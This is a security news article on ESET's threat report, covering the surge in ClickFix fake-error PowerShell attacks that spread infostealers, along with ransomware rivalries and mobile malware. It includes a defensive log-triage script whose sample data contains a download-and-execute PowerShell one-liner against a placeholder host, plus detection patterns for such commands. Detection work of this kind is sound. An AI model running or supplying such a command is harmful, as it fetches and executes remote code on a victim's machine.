ClickFix fake error message malware surges more than 500%, takes second place as the most abused attack vector
- ClickFix is increasingly being used to install infostealers
- The attack vector saw an increase of 500% in the last 6 months
- Users are told to run commands in PowerShell to resolve an error
Use of the ClickFix vector has risen by 517% since the second half of 2024, making it the second most abused attack vector behind phishing.
The attack uses a fake reCAPTCHA to trick users into running code in a PowerShell terminal as a ‘fix’ for a fake error.
This causes malware and infostealers to be downloaded and executed on the target device, after which sensitive data is harvested and exfiltrated to the attackers.
Infostealers rise
ESET's H2 2025 Threat Report explains how ClickFix is abused by attackers to spread some of the most popular infostealer malware, including Lumma Stealer, Vidar Stealer, Stealc and DanaBot.
The attack vector is so effective because it relies on very simple instructions to trick users into running complex commands in the PowerShell terminal. Many users will simply ignore or not understand the commands they are running, focused instead on trying to fix the error.
ClickFix is usually distributed via phishing emails that send the user to a fake website, which requires a reCAPTCHA to be completed to gain access. PowerShell commands often bypass antivirus software, making this a particularly effective way to compromise devices, especially if the attacker can get the user to run them.
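Because the user launches the PowerShell command themselves, process-creation telemetry is where a defender usually catches this: a powershell.exe started from an interactive parent (the Win+R Run box is hosted by explorer.exe) with a hidden window, an execution-policy bypass, an encoded command, or a download-and-execute pattern is the combination to look for. The following is an added example, not code from the article or from ESET: a small triage script that scores constructed process-creation log lines against those heuristics. The log format, the indicator weights, the threshold and the sample lines (with the example.invalid host) are all assumptions constructed for this illustration.

```python
import re

# Heuristic indicators commonly seen when a user pastes an attacker-supplied
# PowerShell one-liner into the Run dialog. Patterns and weights are
# constructed for this example, not taken from the ESET report.
INDICATORS = {
    "hidden_window":   (re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), 2),
    "policy_bypass":   (re.compile(r"-e(?:xecution)?p(?:olicy)?\s+bypass", re.I), 2),
    "encoded_command": (re.compile(r"-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I), 3),
    "download_cradle": (re.compile(r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile)\b", re.I), 3),
    "inline_execute":  (re.compile(r"\b(?:iex|invoke-expression)\b", re.I), 3),
}

# Parents that indicate an interactive launch (the Win+R Run box runs under explorer.exe).
INTERACTIVE_PARENTS = {"explorer.exe"}

# Constructed log format: parent=<image> image=<image> cmd="<command line>"
LOG_RE = re.compile(r'parent=(\S+)\s+image=(\S+)\s+cmd="(.*)"\s*$')

# Constructed sample events: one ClickFix-style paste, one benign interactive
# launch, one scheduled admin script, one encoded launch from the Run box.
SAMPLE_LOG = [
    r'parent=explorer.exe image=powershell.exe cmd="powershell -w hidden -ep bypass -c \'iwr http://example.invalid/f | iex\'"',
    r'parent=explorer.exe image=powershell.exe cmd="powershell -Command Get-Process"',
    r'parent=services.exe image=powershell.exe cmd="powershell -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"',
    r'parent=explorer.exe image=powershell.exe cmd="powershell -e aGVsbG8gd29ybGQgdGhpcyBpcyBhIHRlc3Q="',
]


def parse_event(line):
    """Parse one constructed log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    return {"parent": m.group(1).lower(), "image": m.group(2).lower(), "cmd": m.group(3)}


def score_event(event):
    """Return (score, reasons): the sum of matched indicator weights and their names."""
    reasons = []
    score = 0
    if not event["image"].endswith("powershell.exe"):
        return 0, reasons
    if event["parent"] in INTERACTIVE_PARENTS:
        score += 2
        reasons.append("interactive_parent")
    for name, (pattern, weight) in INDICATORS.items():
        if pattern.search(event["cmd"]):
            score += weight
            reasons.append(name)
    return score, reasons


def triage(lines, threshold=5):
    """Return the events whose score reaches the threshold, in input order."""
    hits = []
    for line in lines:
        event = parse_event(line)
        if event is None:
            continue
        score, reasons = score_event(event)
        if score >= threshold:
            hits.append({"cmd": event["cmd"], "score": score, "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in triage(SAMPLE_LOG):
        print(f"[{hit['score']:2d}] {', '.join(hit['reasons'])}: {hit['cmd']}")
```

Of the four constructed events, the first (hidden window, policy bypass, download cradle and inline execution from an interactive parent) and the fourth (an encoded command launched from the Run box) cross the threshold; the benign interactive launch and the scheduled backup script do not, even though the latter also uses an execution-policy bypass. Weighting the interactive parent is the key design choice: the same one-liner run by a deployment service is far less suspicious than one typed by a user who was just shown an error page.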
In other infostealer news, the ESET threat report shows that SnakeStealer has overtaken Agent Tesla as the most detected infostealer. SnakeStealer was seen being used in a huge campaign targeting hundreds of US and EU companies to steal credentials.
Ransomware gangs experienced an unexpectedly tumultuous period thanks to infighting and rivalry between different ransomware outfits. The DragonForce group launched a spree of defacement campaigns against some of the most notorious ransomware groups, including BlackLock, Mamona and the ransomware-as-a-service giant RansomHub.
Although there have been significant law enforcement operations against ransomware groups in recent months, including the action against 8Base, it seems that rivalry has caused the most damage to the ransomware ecosystem.
On the mobile front, the recent wave of Kaleidoscope infections has risen by 160%. Malware distributed via official app stores is nothing new, with the recent SparkKitty malware distributed through both the Apple App Store and the Google Play Store.
However, the Kaleidoscope malware used a dual approach: displaying intrusive adverts on the target device to generate advertising revenue, while also infecting target devices with a malicious twin app downloaded via a third-party app store.
“From new social engineering techniques to refined mobile threats and major disruptions on the infostealer front, the threat landscape in the first half of 2025 was anything but boring,” said Jiří Kropáč, ESET Director of Threat Prevention Labs.